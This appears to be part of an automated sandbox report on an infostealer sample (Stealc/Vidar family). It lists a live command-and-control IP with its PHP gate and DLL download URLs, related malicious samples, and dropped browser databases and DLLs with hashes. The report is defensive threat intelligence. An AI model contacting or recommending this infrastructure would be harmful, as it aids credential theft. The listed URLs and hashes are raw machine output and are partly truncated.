http://185.215.113.37/e2b1563c6670f193.php~	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
Http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, FBFCAKKK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.1936049768.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	file.exe, 00000000.00000003.1756083936.000000001D25C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll8	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpr	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpq	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	GDHIDHIEGIIIECAKEBFB.0.dr	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Visual	file.exe, 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.37e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, FBFCAKKK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpx	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpser	file.exe, 00000000.00000002.1936049768.0000000000D87000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmp	false		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dllf	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dllw	file.exe, 00000000.00000002.1936049768.0000000000D87000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpf	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpdll	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpj	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	file.exe, 00000000.00000002.1953958694.0000000029281000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, GDHIDHIEGIIIECAKEBFB.0.dr	false	Avira URL Cloud: safe	unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.1957073274.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1948696633.000000001D353000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37tE	file.exe, 00000000.00000002.1936049768.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll/	file.exe, 00000000.00000002.1936049768.0000000000D72000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpM	file.exe, 00000000.00000002.1936049768.0000000000D72000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false	Avira URL Cloud: safe	unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	file.exe, 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	file.exe, 00000000.00000002.1953958694.0000000029281000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, GDHIDHIEGIIIECAKEBFB.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	FBFCAKKK.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/#	file.exe, 00000000.00000002.1936049768.0000000000D87000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpV	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dllz	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpZ	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	file.exe, 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, FBFCAKKK.0.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000002.1953958694.0000000029281000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, GDHIDHIEGIIIECAKEBFB.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpB	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	file.exe, file.exe, 00000000.00000003.1756083936.000000001D25C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	file.exe, 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	FBFCAKKK.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	JJECGCBGDBKJJKEBFBFHJEBGDG.0.dr	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	FBFCAKKK.0.dr	false	URL Reputation: safe	unknown
https://ac.ecopnacl	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpe950	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php1	file.exe, 00000000.00000002.1936049768.0000000000D72000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.1953958694.0000000029281000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, GDHIDHIEGIIIECAKEBFB.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php3	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php:	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org	JJECGCBGDBKJJKEBFBFHJEBGDG.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php&	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecop	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	FBFCAKKK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll.	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1518673
Start date and time:	2024-09-26 00:38:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/22@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 78 Number of non-executed functions: 113
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	SecuriteInfo.com.Win32.TrojanX-gen.27580.21343.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	yKdUWqd0Gs.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	nZ0aiGjW9V.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	wkoozurOWo.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	86aY1jzemK.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	iubXkDP5lk.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	IWXaKkm4pm.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	SecuriteInfo.com.Win32.TrojanX-gen.27580.21343.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	yKdUWqd0Gs.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	7l2s6qwHg7.exe	Get hash	malicious	RedLine	Browse	185.215.113.9
	nZ0aiGjW9V.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	wkoozurOWo.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	86aY1jzemK.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	iubXkDP5lk.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	yjzllYsjlU.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.103

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	86aY1jzemK.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	86aY1jzemK.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\BKKJKFBKKECFHJKEBKEH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBKJKJDB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBFHDHJKKJDHJJJJKEGHIDGDHD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHCBAAEHCFIDGDHJEHC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FBFCAKKK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDHIDHIEGIIIECAKEBFB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\HDGCAAFBFBKFIDGDHJDBKECFBA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJECGCBGDBKJJKEBFBFHJEBGDG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 86aY1jzemK.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 86aY1jzemK.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
